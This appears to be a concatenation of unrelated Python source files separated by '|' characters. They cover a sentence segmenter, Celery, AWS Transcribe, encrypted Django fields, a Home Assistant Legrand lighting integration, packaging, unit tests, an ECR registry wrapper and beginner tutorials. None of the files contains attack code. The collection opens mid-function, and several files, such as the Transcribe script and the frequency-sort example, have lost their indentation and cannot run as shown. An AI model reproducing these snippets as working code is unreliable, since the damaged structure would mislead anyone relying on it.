re_eos = re.compile(r'([.?!])([ ][ ])[\n]?([A-Z])')
texts = (re_eos.sub(r'\1\n\3', doc) for doc in texts)
if train_path:
generate_sentences.detector = Detector(slurp(train_path), epochs=epochs, nocase=not case_sensitive)
elif not isinstance(getattr(generate_sentences, 'detector', None), Detector):
generate_sentences.detector = Detector.load(
os.path.join(DATA_PATH, 'wsj_pugnlp.detector_morse.Detector.json.gz'))
# generate_sentences.detector = SentenceDetector(text=text, nocase=not case_sensitive,
# epochs=epochs, classifier=classifier)
return iter(chain.from_iterable((s.lstrip() for s in generate_sentences.detector.segments(text)) for text in texts))
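# A hedged usage sketch; 'doc.txt' is a placeholder path:
#
# for sentence in generate_sentences(open('doc.txt').read()):
#     print(sentence)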
class PassageIter(object):
"""Passage (document, sentence, line, phrase) generator for files at indicated path
Walks all the text files it finds in the indicated path,
segmenting sentences and yielding them one at a time
References:
Radim's [word2vec tutorial](http://radimrehurek.com/2014/02/word2vec-tutorial/)
"""
    def __init__(self, path='', ext='', level=None, dirs=False, files=True,
                 sentence_segmenter=generate_sentences, word_segmenter=str.split, verbosity=0):
        self.file_generator = generate_files(path=path, ext=ext, level=level, dirs=dirs,
                                             files=files, verbosity=verbosity)
    def __iter__(self):
        # Assumes generate_files yields stat dicts with a 'path' key,
        # like find_files above.
        for stat in self.file_generator:
            for line in open(stat['path']):
                yield line.split()
|
#!/usr/bin/env python
#coding:utf-8
#__time__: 2020/6/18 22:39
#__author__ = 'ren_mcc'
import sys
import os
project_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
sys.path.insert(0,project_dir)
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "backend.settings")
import django
django.setup()
from celery import states
from celery.result import AsyncResult
from celery.utils import get_full_cls_name
from celery.utils.encoding import safe_repr
result = AsyncResult('e27afabf-06c2-4131-98bf-ffcf12720597')
print(result.state, result.result)
|
import boto3
import requests
from requests import get
from pprint import pprint
import json
import time
client=boto3.client('transcribe')
def start_transcribe(job_name, file):
''' Starts AWS Transcribe job with a given mp3 file in S3 bucket. '''
response = client.start_transcription_job(
TranscriptionJobName=job_name,
LanguageCode='en-US',
MediaFormat='mp3',
Media={
'MediaFileUri': file
}
)
def get_job_status(job_name):
''' Gets job status from AWS Transcribe.'''
response = client.get_transcription_job(
TranscriptionJobName=job_name
)
return response['TranscriptionJob']['TranscriptionJobStatus']
def get_response(job_name, filetobedownloaded):
''' Gets file url from a JSON file with job results from AWS Transcribe.
Downloads the file from Transcribe to local drive.'''
    response = client.get_transcription_job(
        TranscriptionJobName=job_name
    )
    job = response['TranscriptionJob']
    url = job['Transcript']['TranscriptFileUri']
#Download file to local drive to be processed
def download(url, filetobedownloaded):
with open(filetobedownloaded, "wb") as file:
response = get(url)
file.write(response.content)
download(url,filetobedownloaded)
def get_brutus_response(brutusresponse):
''' Processes def get_response given file, returns as text
what was said in audio file that Transcribe processed. '''
with open(brutusresponse, 'r') as readfile:
data = json.load(readfile)
for item in data['results']['transcripts']:
global brutus_input
brutus_input = item['transcript']
return 'Command given: ' + brutus_input
def transcribe_brutus(job,jobname_stat,brutusresponse):
''' Recursive function that prints out get_brutus_response
for a job started when the job is completed.
    Used in conjunction with start_transcribe. '''
if str(get_job_status(jobname_stat))=='COMPLETED':
get_response(jobname_stat, brutusresponse)
print(str(get_brutus_response(brutusresponse)))
else:
time.sleep(5)
        transcribe_brutus(job, jobname_stat, brutusresponse)
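# --- Usage sketch (added; names are illustrative) ---
# The MP3 must already exist in an accessible S3 bucket; the job name, URI
# and output filename below are placeholders, not values from the original.
if __name__ == '__main__':
    job = 'brutus-demo'
    start_transcribe(job, 's3://my-bucket/command.mp3')
    transcribe_brutus(job, job, 'brutus_response.json')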
|
from grizzly.dataframes.frame import Table
from grizzly.generator import GrizzlyGenerator
def use(backend):
GrizzlyGenerator._backend = backend
def close():
GrizzlyGenerator.close()
def read_table(tableName):
return Table(tableName) |
from django.db import models
import pgcrypto
class Employee(models.Model):
name = models.CharField(max_length=200)
age = pgcrypto.EncryptedIntegerField(default=42)
ssn = pgcrypto.EncryptedCharField("SSN", versioned=True, blank=True)
salary = pgcrypto.EncryptedDecimalField()
date_hired = pgcrypto.EncryptedDateField(cipher="bf", key="datekey", auto_now_add=True)
email = pgcrypto.EncryptedEmailField(unique=True, null=True)
date_modified = pgcrypto.EncryptedDateTimeField(auto_now=True)
def __str__(self):
return self.name
@property
def raw(self):
return RawEmployee.objects.get(pk=self.pk)
class RawEmployee(models.Model):
name = models.CharField(max_length=200)
age = models.TextField()
ssn = models.TextField()
salary = models.TextField()
date_hired = models.TextField()
email = models.TextField(null=True)
date_modified = models.TextField()
class Meta:
db_table = "testapp_employee"
managed = False
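# Usage sketch (illustrative; not part of the models). Encrypted fields behave
# like ordinary fields through the ORM, while the unmanaged RawEmployee model
# maps onto the same table and exposes the stored ciphertext:
#   emp = Employee.objects.create(name='Ada', age=36, salary='1234.56')
#   emp.age      # -> 36, decrypted transparently
#   emp.raw.age  # -> the armored ciphertext string, not 36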
|
"""The Legrand RFLC integration light platform."""
from collections.abc import Mapping
from typing import Final
from homeassistant import config_entries
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_TRANSITION,
COLOR_MODE_BRIGHTNESS,
SUPPORT_TRANSITION,
LightEntity,
)
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity import DeviceInfo
from .const import DOMAIN
class _Switch(LightEntity):
_attr_should_poll = False
def __init__(self, hub, zid: int, properties: Mapping):
self._hub = hub
self._attr_name = properties[hub.NAME]
self._attr_is_on = properties[hub.POWER]
self._device_type = properties[hub.DEVICE_TYPE]
self._zid = zid
hub.on(
f"{hub.EVENT_ZONE_PROPERTIES_CHANGED}:{zid}",
self._zone_properties_changed,
)
hub.on(hub.EVENT_CONNECTED, self._available)
hub.on(hub.EVENT_DISCONNECTED, self._available)
hub.on(hub.EVENT_AUTHENTICATED, self._available)
hub.on(hub.EVENT_UNAUTHENTICATED, self._available)
@property
def unique_id(self) -> str:
return f"{self._hub.host()}:{self._zid}"
@property
def available(self) -> bool:
return self._hub.connected and self._hub.authenticated
@property
def device_info(self) -> DeviceInfo:
return DeviceInfo(
identifiers={(DOMAIN, self.unique_id)},
manufacturer="Legrand",
model="LC7001",
name=f"{self._attr_name} {self._device_type}",
            via_device=(DOMAIN, self._hub.host()),
)
async def _available(self) -> None:
self.async_write_ha_state()
def _zone_properties_changed_switch(self, message: Mapping) -> None:
hub = self._hub
if hub.PROPERTY_LIST in message:
properties = message[hub.PROPERTY_LIST]
if hub.POWER in properties:
self._attr_is_on = properties[hub.POWER]
async def _zone_properties_changed(self, message: Mapping) -> None:
self._zone_properties_changed_switch(message)
self.async_write_ha_state()
async def _async_switch(self, power: bool) -> None:
hub = self._hub
async def handle(message: Mapping):
hub.StatusError(message).raise_if()
await hub.handle_send(
handle, hub.compose_set_zone_properties(self._zid, power=power)
)
async def async_turn_on(self, **kwargs) -> None:
await self._async_switch(True)
async def async_turn_off(self, **kwargs) -> None:
await self._async_switch(False)
class _Dimmer(_Switch):
_attr_color_mode = COLOR_MODE_BRIGHTNESS
_attr_supported_color_modes = {COLOR_MODE_BRIGHTNESS}
_attr_supported_features = SUPPORT_TRANSITION
@staticmethod
def _normalize(value: int, ceiling: int) -> float:
"""Normalize [0, ceiling] to [0.0, 1.0]."""
return value / ceiling
@staticmethod
def _quantize(value: float, ceiling: int) -> int:
"""Quantize [0.0, 1.0] to [0, ceiling]."""
return int(value * ceiling)
# dimming ceilings for homeassistant and us (LC7001)
HA: Final[int] = 255
US: Final[int] = 100
@staticmethod
def _to_ha(value: int) -> int:
return _Dimmer._quantize(_Dimmer._normalize(value, _Dimmer.US), _Dimmer.HA)
@staticmethod
    def _from_ha(value: int) -> int:
return _Dimmer._quantize(_Dimmer._normalize(value, _Dimmer.HA), _Dimmer.US)
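    # Worked examples (illustrative): _to_ha(100) == 255, _to_ha(50) == 127,
    # _from_ha(255) == 100, _from_ha(128) == 50. Quantization truncates, so a
    # round-trip can lose one step of precision.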
def __init__(self, hub, zid: int, properties: Mapping):
super().__init__(hub, zid, properties)
self._attr_brightness = self._to_ha(properties[hub.POWER_LEVEL])
async def _zone_properties_changed(self, message: Mapping) -> None:
self._zone_properties_changed_switch(message)
hub = self._hub
if hub.PROPERTY_LIST in message:
properties = message[hub.PROPERTY_LIST]
if hub.POWER_LEVEL in properties:
self._attr_brightness = self._to_ha(properties[hub.POWER_LEVEL])
self.async_write_ha_state()
async def _async_dimmer(self, power: bool, **kwargs) -> None:
hub = self._hub
async def handle(message: Mapping) -> None:
hub.StatusError(message).raise_if()
properties: dict = {"power": power}
if ATTR_BRIGHTNESS in kwargs:
brightness = self._from_ha(kwargs[ATTR_BRIGHTNESS])
properties["power_level"] = brightness
else:
if power:
brightness = self._from_ha(self.brightness)
else:
brightness = 0
if ATTR_TRANSITION in kwargs:
change = abs(brightness - self._from_ha(self.brightness))
properties["ramp_rate"] = min(
max(int(change / kwargs[ATTR_TRANSITION]), 1), 100
)
await hub.handle_send(
handle,
hub.compose_set_zone_properties(self._zid, **properties),
)
async def async_turn_on(self, **kwargs) -> None:
await self._async_dimmer(True, **kwargs)
async def async_turn_off(self, **kwargs) -> None:
await self._async_dimmer(False, **kwargs)
async def async_setup_entry(
hass: HomeAssistant,
entry: config_entries.ConfigEntry,
async_add_entities,
) -> None:
"""Set up the Legrand RFLC integration light platform.
Adds a Dimmer or Switch for each like zone on this entry's hub.
"""
hub = hass.data[DOMAIN][entry.entry_id]
async def zones(message: Mapping) -> None:
async def zone(message: Mapping) -> None:
zid = message[hub.ZID]
properties = message[hub.PROPERTY_LIST]
device_type = properties[hub.DEVICE_TYPE]
if device_type == hub.DIMMER:
async_add_entities([_Dimmer(hub, zid, properties)], False)
elif device_type == hub.SWITCH:
async_add_entities([_Switch(hub, zid, properties)], False)
hub.StatusError(message).raise_if()
for item in message[hub.ZONE_LIST]:
await hub.handle_send(
zone, hub.compose_report_zone_properties(item[hub.ZID])
)
await hub.handle_send(zones, hub.compose_list_zones())
|
import setuptools
import warnings
DISTNAME = "scipydirect"
DESCRIPTION = "Python wrapper to the DIRECT algorithm"
LONG_DESCRIPTION ="""
DIRECT is a method to solve global bound constraint optimization problems and
was originally developed by D. R. Jones, C. D. Perttunen and B. E. Stuckmann.
scipydirect is a fork of pydirect providing a scipy.optimize-compatible
syntax. It uses the Fortran implementation of DIRECT written by
Joerg M. Gablonsky, DIRECT Version 2.0.4.
For more info see the `documentation <http://scipydirect.readthedocs.io/en/latest/>`_ or the `source code <http://github.com/andim/scipydirect>`_.
"""
MAINTAINER = "Andreas Mayer"
MAINTAINER_EMAIL = "[email protected]"
URL = "http://github.com/andim/scipydirect"
LICENSE = "MIT"
VERSION = "1.3"
classifiers = ['Development Status :: 5 - Production/Stable',
'Programming Language :: Python',
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
'License :: OSI Approved :: MIT License',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Mathematics',
'Operating System :: OS Independent']
def configuration(parent_package='', top_path=None):
from numpy.distutils.misc_util import Configuration
config = Configuration(DISTNAME, parent_package, top_path,
version=VERSION,
maintainer=MAINTAINER,
maintainer_email=MAINTAINER_EMAIL,
description=DESCRIPTION,
license=LICENSE,
url=URL,
long_description=LONG_DESCRIPTION)
return config
if __name__ == "__main__":
from numpy.distutils.core import setup
kwargs = dict(
packages=setuptools.find_packages(),
include_package_data=True,
platforms=["any"],
requires=["numpy"],
install_requires=["numpy"],
tests_require=['nose',],
test_suite='nose.collector',
zip_safe=True,
classifiers=classifiers,
)
try:
thiskwargs = kwargs.copy()
config = configuration()
config.add_extension('direct', sources=['src/direct.pyf', 'src/DIRect.f', 'src/DIRserial.f', 'src/DIRsubrout.f'])
thiskwargs.update(config.todict())
setup(**thiskwargs)
except:
        # if there was an error, try building the module without the Fortran
        # extension; the module will not be usable, but the documentation can
        # still be built (for readthedocs)
        warnings.warn('There was an error building the Fortran extension.')
thiskwargs = kwargs.copy()
config = configuration()
thiskwargs.update(config.todict())
setup(**thiskwargs)
|
from __future__ import unicode_literals
from frappe import _
def get_data():
return {
'fieldname': 'fiscal_year',
'transactions': [
{
'label': _('Budgets'),
'items': ['Budget']
},
{
'label': _('References'),
'items': ['Period Closing Voucher', 'Tax Withholding Category']
},
{
'label': _('Target Details'),
'items': ['Sales Person', 'Sales Partner', 'Territory', 'Monthly Distribution']
}
]
}
|
class Handling:
"""
An object representing a request received by an endpoint and the
response it returns.
"""
def __init__(self, endpoint, request, response):
self.endpoint = endpoint
self.request = request
self.response = response
def __repr__(self):
return ('Handling(endpoint=%r, request=%r, response=%r)' %
(self.endpoint, self.request, self.response))
|
"""
How to speed up a for loop with break and continue
--------------------------------------------------
continue: jump to the next iteration; the remaining part of the current
          iteration won't be executed
break:    jump out of the for loop; the remaining part of the whole loop
          won't be executed
"""
print('This is a normal for loop')
for i in range(4):
print(i)
print('\nThis is an example for continue')
for i in range(4):
if i == 2:
continue
print(i)
print('\nThis is an example for break')
for i in range(4):
if i == 2:
break
print(i)
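# Extra illustration (added): break is what gives the speed-up, since it stops
# a search as soon as the answer is found instead of scanning the whole list
print('\nThis is an example of an early-exit search')
values = [3, 1, 4, 1, 5]
for v in values:
    if v == 4:
        print('found', v)
        break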
print('\nEnd of examples') |
import os
from pathlib import Path
from rhizo.config import load_config
def check_config(config):
assert config.output_path == '/foo/bar'
assert config.sub_config.a == 'test'
assert config.sub_config.b == 2
assert round(config.sub_config.c - 3.14, 4) == 0
def _load_test_config(filename, use_environ=False):
"""Load a config file from the test_data subdirectory."""
path = Path(__file__).parent / 'test_data' / filename
return load_config(str(path), use_environ)
def test_environment_config():
os.environ['RHIZO_SUB_CONFIG'] = 'a: override\nb: 3'
os.environ['RHIZO_OTHER_SETTING'] = 'from_env'
config = _load_test_config('sample_config.json', True)
# Not overridden in environment
assert config.output_path == '/foo/bar'
# Overridden in environment; dict value in environment
assert config.sub_config == { "a": "override", "b": 3 }
# Only specified in environment
assert config.other_setting == 'from_env'
def test_json_config():
# Make sure environment override only happens if requested
os.environ['RHIZO_OUTPUT_PATH'] = 'overridden'
config = _load_test_config('sample_config.json')
check_config(config)
def test_yaml_config():
config = _load_test_config('sample_config.yaml')
check_config(config)
def test_get_with_default():
config = _load_test_config('sample_config.yaml')
assert config.get('nonexistent') is None
assert config.get('nonexistent', 'value') == 'value'
assert config.get('nonexistent', []) == []
def test_config_update():
config = _load_test_config('sample_config.yaml')
config.update(_load_test_config('update.yaml'))
assert config.output_path == '/foo/test'
assert config.sub_config.a == 'test'
assert config.sub_config.b == 3
|
import numpy
N, M = map(int, input().split())
array = numpy.array([input().split() for _ in range(N)], int)
print(numpy.transpose(array))
print(array.flatten()) |
import re
from regression_tests import *
class UserAndLinkedTest(Test):
"""Tests that the generated functions are recognized as "user-defined",
"statically linked", and "dynamically linked", and put into proper sections
in the generated C file.
Also, we check that a correct separation is done in the generated DSM file.
"""
settings = TestSettings(
input='wide-strings.ex'
)
def test_funcs_are_separated_in_c_into_user_defined_dynamically_linked_and_statically_linked(self):
expected_code_re = re.compile("""
-\ Functions\ -
.*
main
.*
-\ Statically\ Linked\ Functions\ -
.*
___main
.*
-\ Dynamically\ Linked\ Functions\ -
.*
_wfopen
""",
flags=re.VERBOSE | re.DOTALL
)
assert self.out_c.contains(expected_code_re)
def test_funcs_are_correctly_marked_in_dsm(self):
assert self.out_dsm.contains(r'; *function: main')
assert self.out_dsm.contains(r'; *statically linked function: ___multadd_D2A')
assert self.out_dsm.contains(r'; *statically linked function: ___main')
class UserAndSyscallTest(Test):
"""Tests that the generated functions are recognized as "user-defined" and
"syscall", an put into proper sections in the generated C file.
"""
settings = TestSettings(
input='732-sample-1991.elf'
)
def test_funcs_are_separated_in_c_into_user_defined_and_syscalls(self):
expected_code_re = re.compile("""
-\ Functions\ -
.*
entry_point
.*
-\ System-Call\ Functions\ -
.*
accept
.*
""",
flags=re.VERBOSE | re.DOTALL
)
assert self.out_c.contains(expected_code_re)
#class IdiomFromFrontendTest(Test):
#"""Tests that the generated functions are recognized "idiom" by frontend,
#an put into proper sections in the generated C file.
#"""
#settings = TestSettings(
#input='idioms.arm.gcc.O0.exe',
#)
#def test_funcs_are_separated_into_idioms(self):
#expected_code_re = re.compile("""
#-\ Instruction-Idiom\ Functions\ -
#.*
#fabsf
#.*
#""",
#flags=re.VERBOSE | re.DOTALL
#)
#assert self.out_c.contains(expected_code_re)
|
#
# Copyright (c) 2020 Yves Vogl
#
import boto3
import boto3.session
import base64
from .repository import Repository
class Registry:
def __init__(self,
registry_id,
profile_name=None,
region_name="eu-central-1",
role_arn=None,
role_session_name=None):
self._repositories = []
self._endpoint = None
self._username = None
self._password = None
session = boto3.session.Session(
region_name=region_name,
profile_name=profile_name
)
        if role_arn is not None:
            response = session.client('sts').assume_role(
                RoleArn=role_arn,
                RoleSessionName=role_session_name
                if role_session_name is not None
                else f'registry-synchronizer-{registry_id}',
            )
session = boto3.session.Session(
region_name=region_name,
profile_name=profile_name,
aws_access_key_id=response['Credentials']['AccessKeyId'],
aws_secret_access_key=response['Credentials']['SecretAccessKey'],
aws_session_token=response['Credentials']['SessionToken']
)
self._registry_id = registry_id
self._client = session.client('ecr')
self.authorize()
def authorize(self):
authorization_token = self._client.get_authorization_token()['authorizationData'][0]
self._endpoint = authorization_token['proxyEndpoint']
self._username, self._password = base64.b64decode(
authorization_token['authorizationToken']
).decode().split(':')
    # FIXME: This method should be mixed in as it's not specific to ECR
def includes(self, repository, ignore_namespace=False, transformation=None, repositories=None):
repository_names = self.repository_names(ignore_namespace)
for repository_name in repository_names:
            name = repository.name(ignore_namespace)
            a = transformation(name) if transformation is not None else name
b = repository_name
if a == b:
matched_repository = next(
(repo for repo in self.repositories if repo.name(ignore_namespace) == repository_name), None)
                if matched_repository is not None and repositories is not None:
if matched_repository.name(ignore_namespace=True) in repositories:
return matched_repository
else:
return None
else:
return matched_repository
@property
def url(self):
return self._endpoint
@property
def name(self):
return self._endpoint.replace("https://", "")
@property
def username(self):
return self._username
@property
def password(self):
return self._password
@property
def repositories(self):
# FIXME: Make iterable
if not self._repositories:
for repo in self._client.describe_repositories(
registryId=self._registry_id,
maxResults=1000
)['repositories']:
repository = Repository(self, repo['repositoryName'])
self._repositories.append(repository)
return self._repositories
def repository_names(self, ignore_namespace=False):
return [
repository.name(ignore_namespace) for repository in self.repositories
]
@property
def client(self):
return self._client
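# --- Usage sketch (added; the account id and role ARN are placeholders) ---
if __name__ == '__main__':
    registry = Registry(
        '123456789012',
        region_name='eu-central-1',
        role_arn='arn:aws:iam::123456789012:role/registry-sync',
    )
    print(registry.name)
    print(registry.repository_names())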
|
import requests
import pytest
from tests.mock_responses import MockURLs, MockResponses
class TestHierarchiesApi:
def test_getHierarchies_success(self, client, requests_mock):
requests_mock.request(
"GET", MockURLs.hierarchies_url, json=MockResponses.mock_hierarchies
)
resp = client.hierarchies.getHierarchies()
assert len(resp["hierarchies"]) == 1
assert isinstance(resp["hierarchies"], list)
assert isinstance(resp["hierarchies"][0], dict)
assert resp["hierarchies"][0]["id"] == "6e292e54-9a26-4be1-9034-607d71492707"
def test_getHierarchies_raises_HTTPError(self, client, requests_mock, caplog):
requests_mock.request(
"GET", MockURLs.hierarchies_url, exc=requests.exceptions.HTTPError
)
with pytest.raises(requests.exceptions.HTTPError):
client.hierarchies.getHierarchies()
assert (
"TSIClient: The request to the TSI api returned an unsuccessfull status code."
in caplog.text
)
def test_getHierarchies_raises_ConnectTimeout(self, client, requests_mock, caplog):
requests_mock.request(
"GET", MockURLs.hierarchies_url, exc=requests.exceptions.ConnectTimeout
)
with pytest.raises(requests.exceptions.ConnectTimeout):
client.hierarchies.getHierarchies()
assert "TSIClient: The request to the TSI api timed out." in caplog.text
|
# tree to be sorted as "eert
def sort_based_on_frequency_of_occurrance(word_to_sort):
class CharToCountMap:
def __init__(self):
self.__char = None
self.__count = None
@property
def char(self):
return self.__char
@char.setter
def char(self,char):
            self.__char = char
@property
def count(self):
return self.__count
@count.setter
def count(self,count):
self.__count = count
def __eq__(self, value):
return self.__char.__eq__(value.char)
def __hash__(self):
return self.__char.__hash__()
def __repr__(self):
return "char: {}, count: {}".format(self.char,self.count)
charToCountMapSet = set()
def get_matching_element_from_list(object,a_list):
is_present = None
for element in a_list:
if type(a_list) is set:
if element == object:
is_present = element
break
else:
if element.char == object.char:
is_present = element
break
return is_present
for char in word_to_sort:
# check if word in set
# if yes
# then get "count"
# increment count
# if no
# then create charToCountMap
# add count = 1
newCharCountMap = CharToCountMap()
newCharCountMap.char = char
newCharCountMap.count = 1
element = get_matching_element_from_list(newCharCountMap,charToCountMapSet)
if element is not None:
newCharCountMap.count = element.count + 1
charToCountMapSet.remove(newCharCountMap)
charToCountMapSet.add(newCharCountMap)
def comperator(lhs,rhs):
if lhs.count >= rhs.count:
return lhs.count
else:
return rhs.count
# default sort is ascending
sortedCharToCountMapSet = sorted(
charToCountMapSet,key=lambda item: item.count, reverse=True
)
print(
sortedCharToCountMapSet
)
def replicate_string(string,times):
string_accrue = ""
for index in range(0,times):
string_accrue = string_accrue + string
return string_accrue
sortedString = ""
    for charToCountMap in sortedCharToCountMapSet:
stringFromCharToCountMap = replicate_string(charToCountMap.char,charToCountMap.count)
sortedString = sortedString + stringFromCharToCountMap
print(sortedString)
# newCharCountMap = CharToCountMap()
# newCharCountMap.char = "t"
# newCharCountMap.count = 1
# newCharCountMapSingleSet = set([newCharCountMap])
# print(
# charToCountMapSet
# )
# print(
# newCharCountMap in charToCountMapSet
# )
# print(
# charToCountMapSet.intersection(
# newCharCountMapSingleSet
# )
# )
# print(
# set([newCharCountMap]).difference_update(
# newCharCountMapSingleSet
# )
# )
# print(
# newCharCountMapSingleSet.difference_update(
# set([newCharCountMap])
# )
# )
sort_based_on_frequency_of_occurrance("treee") # return eeert
sort_based_on_frequency_of_occurrance("trrrreee") # return rrrreeet
|
import unittest
from bupt_ncov_report.pure_utils import *
class Test_PureUtils(unittest.TestCase):
def setUp(self) -> None:
self.u = PureUtils()
def test_isNumberDataInRange_None(self):
self.assertFalse(self.u.is_number_data_in_range(None, (-1, 1)))
def test_isNumberDataInRange_EmptyStr(self):
self.assertFalse(self.u.is_number_data_in_range('', (-1, 1)))
def test_isNumberDataInRange_Hex_1(self):
self.assertFalse(self.u.is_number_data_in_range('0X1A', (0, 32)))
def test_isNumberDataInRange_Hex_2(self):
self.assertFalse(self.u.is_number_data_in_range('1A', (0, 32)))
def test_isNumberDataInRange_Text(self):
self.assertFalse(self.u.is_number_data_in_range('abc', (0, 32)))
def test_isNumberDataInRange_UpperBound(self):
self.assertFalse(self.u.is_number_data_in_range(100, (-82, 100)))
def test_isNumberDataInRange_NumInStr(self):
self.assertTrue(self.u.is_number_data_in_range('233', (0, 1000)))
def test_isNumberDataInRange_LowerBound(self):
self.assertTrue(self.u.is_number_data_in_range('-82', (-82, 100)))
def test_matchReGroup1_1Group(self):
with self.assertRaises(BaseException) as _ctxt:
self.u.match_re_group1(r'abc(\d+)def', 'abcdef')
self.assertEqual('1234', self.u.match_re_group1(r'abc(\d+)def', 'abc1234def'))
def test_matchReGroup1_2Group(self):
self.assertEqual('1234', self.u.match_re_group1(r'abc(\d+)(def)', 'abc1234def'))
def test_looksTruthy(self):
self.assertTrue(PureUtils.looks_truthy('Fuck You'))
self.assertTrue(PureUtils.looks_truthy('true'))
self.assertTrue(PureUtils.looks_truthy('1 '))
self.assertTrue(PureUtils.looks_truthy(1))
self.assertTrue(PureUtils.looks_truthy([[]]))
self.assertFalse(PureUtils.looks_truthy('fAlSe'))
self.assertFalse(PureUtils.looks_truthy(' 0'))
self.assertFalse(PureUtils.looks_truthy(0))
self.assertFalse(PureUtils.looks_truthy(dict()))
self.assertFalse(PureUtils.looks_truthy([0]))
self.assertFalse(PureUtils.looks_truthy(None))
def test_looksFalsy(self):
self.assertFalse(PureUtils.looks_falsy('Fuck You'))
self.assertFalse(PureUtils.looks_falsy('true'))
self.assertFalse(PureUtils.looks_falsy('1 '))
self.assertFalse(PureUtils.looks_falsy(1))
self.assertFalse(PureUtils.looks_falsy([[]]))
self.assertTrue(PureUtils.looks_falsy('fAlSe'))
self.assertTrue(PureUtils.looks_falsy(' 0'))
self.assertTrue(PureUtils.looks_falsy(0))
self.assertTrue(PureUtils.looks_falsy(dict()))
self.assertTrue(PureUtils.looks_falsy([0]))
self.assertTrue(PureUtils.looks_falsy(None))
if __name__ == '__main__':
unittest.main()
|
import unittest
import zipfile
class DatasetMergeTest(unittest.TestCase):
def test_dataset(self):
with zipfile.ZipFile('tests/dataset_merge/dataset.zip') as zf:
self.assertEqual(
sorted(zf.namelist()),
['data1.in', 'data2.in', 'data3.ans', 'data3.in'])
def test_empty(self):
with zipfile.ZipFile('tests/dataset_merge/empty.zip') as zf:
self.assertEqual(zf.namelist(), [])
if __name__ == '__main__':
unittest.main()
|
from functools import reduce  # reduce lives in functools, not setuptools
l1 = [2, 3, 4, 5, 6]
mapping_the_l1 = list(map(lambda x: x * 2, l1))  # MAP APPLIES THE GIVEN FUNCTION TO EVERY ELEMENT OF A LIST
# IN THIS CASE WE ARE MULTIPLYING EVERY ELEMENT OF LIST l1 BY 2 USING A LAMBDA FUNCTION
print(mapping_the_l1)
filtering_the_l1 = list(filter(lambda x: x % 2 == 0, l1))  # FILTER KEEPS ONLY THE ELEMENTS THAT PASS A TEST
# IN THIS CASE WE ARE FILTERING THE NUMBERS WHICH ARE DIVISIBLE BY 2 IN l1.
print(filtering_the_l1)
def add(x, y):
    return x + y
reducing_the_l1 = reduce(add, l1)  # REDUCE FOLDS A LIST INTO A SINGLE VALUE USING A BINARY FUNCTION
# HERE, WE ARE ADDING ALL THE ELEMENTS OF THE LIST l1
print(reducing_the_l1)
|
import numpy as _np
from scipy.io import loadmat as _loadmat
from .. import dnpData as _dnpData
def importPower(path,filename = ''):
'''
import powers file
'''
fullPath = path + filename
if fullPath[-4:] == '.mat':
rawDict = _loadmat(fullPath)
t = rawDict['timelist'].reshape(-1)
p = rawDict['powerlist'].reshape(-1)
elif fullPath[-4:] == '.csv':
raw = _np.loadtxt(fullPath,delimiter = ',',skiprows = 1)
t = raw[:,0].reshape(-1)
p = raw[:,1].reshape(-1)
else:
print('Could not identify power data type')
return
return t,p
def chopPower(t,p,threshold = 0.1):
'''
Use Derivative to chop Powers
'''
diffPower = _np.diff(p)
step = [abs(x) > threshold for x in diffPower]
correctedStep = []
for ix in range(len(step) - 1):
if step[ix] and step[ix+1]:
correctedStep.append(False)
elif step[ix] and not step[ix+1]:
correctedStep.append(True)
else:
correctedStep.append(False)
stepIndex = [0]
for ix in range(len(correctedStep)):
if correctedStep[ix]:
stepIndex.append(ix)
stepTupleList = []
for ix in range(len(stepIndex)-1):
stepTupleList.append((stepIndex[ix],stepIndex[ix+1]))
averagePowerList = []
averageTimeList = []
for stepTuple in stepTupleList:
averagePower = p[stepTuple[0]+1:stepTuple[1]]
averagePower = _np.mean(averagePower)
averagePowerList.append(averagePower)
averageTime = (t[stepTuple[0]+1] + t[stepTuple[1]]) / 2.
averageTimeList.append(averageTime)
averagePowerArray = _np.array(averagePowerList)
averageTimeArray = _np.array(averageTimeList)
return averageTimeArray, averagePowerArray
def assignPower(dataDict,expNumList,powersList):
'''
Given a dictionary of dnpData objects with key being folder string,
return the data with power values assigned to a new axis dimension
'''
doInitialize = True
for ix,expNum in enumerate(expNumList):
if str(expNum) in dataDict:
if doInitialize:
data = dataDict[str(expNum)]
data.addAxes('power',powersList[ix])
doInitialize = False
else:
tempData = dataDict[str(expNum)].copy()
tempData.addAxes('power',powersList[ix])
data.concatenateAlong(tempData,'power')
return data
if __name__ == '__main__':
from matplotlib.pylab import *
#### Set Custom Matplotlib Parameters
#matplotlib.rcParams['font.family'] = 'Myriad Pro' # font style, same as illustrator default
matplotlib.rcParams['font.size'] = 24. # font size for axis
matplotlib.rcParams['lines.linewidth'] = 1.
matplotlib.rcParams['axes.linewidth'] = 2.
matplotlib.rcParams['legend.fontsize'] = 14. # set legend font
#matplotlib.rcParams['legend.fontsize'] = 20. # set legend font
#matplotlib.rcParams['figure.subplot.bottom'] = 0.15
matplotlib.rcParams['figure.subplot.bottom'] = 0.20
matplotlib.rcParams['figure.subplot.top'] = .9
#matplotlib.rcParams['figure.subplot.left'] = .125
matplotlib.rcParams['figure.subplot.left'] = .20
matplotlib.rcParams['figure.subplot.right'] = .9
    matplotlib.rcParams['xtick.major.size'] = 10 # major tick length
    matplotlib.rcParams['xtick.major.width'] = 2 # major tick thickness
    matplotlib.rcParams['xtick.minor.size'] = 5 # minor tick length
    matplotlib.rcParams['xtick.minor.width'] = 1 # minor tick thickness
    matplotlib.rcParams['xtick.direction'] = 'out' # tick direction
    matplotlib.rcParams['ytick.major.size'] = 10 # major tick length
    matplotlib.rcParams['ytick.major.width'] = 2 # major tick thickness
    matplotlib.rcParams['ytick.minor.size'] = 5 # minor tick length
    matplotlib.rcParams['ytick.minor.width'] = 1 # minor tick thickness
    matplotlib.rcParams['ytick.direction'] = 'out' # tick direction
matplotlib.rcParams['pdf.fonttype'] = 42 # set font type so that I can edit with illustrator
path = 'G:/My Drive/Exchange/Projects/0055 CPF-NIGM-0055 ODNP System/Software/Python/data/TEMPO_and_PEG_ODNP_data/TEMPO_and_PEG_ODNP_data/20191017_TW_4OHTEMPO_1p0mM/'
filename = 'power.mat'
t,p = importPower(path,filename)
figure('raw powers')
plot(t,p,linewidth = 2.)
xlabel('Time (s)')
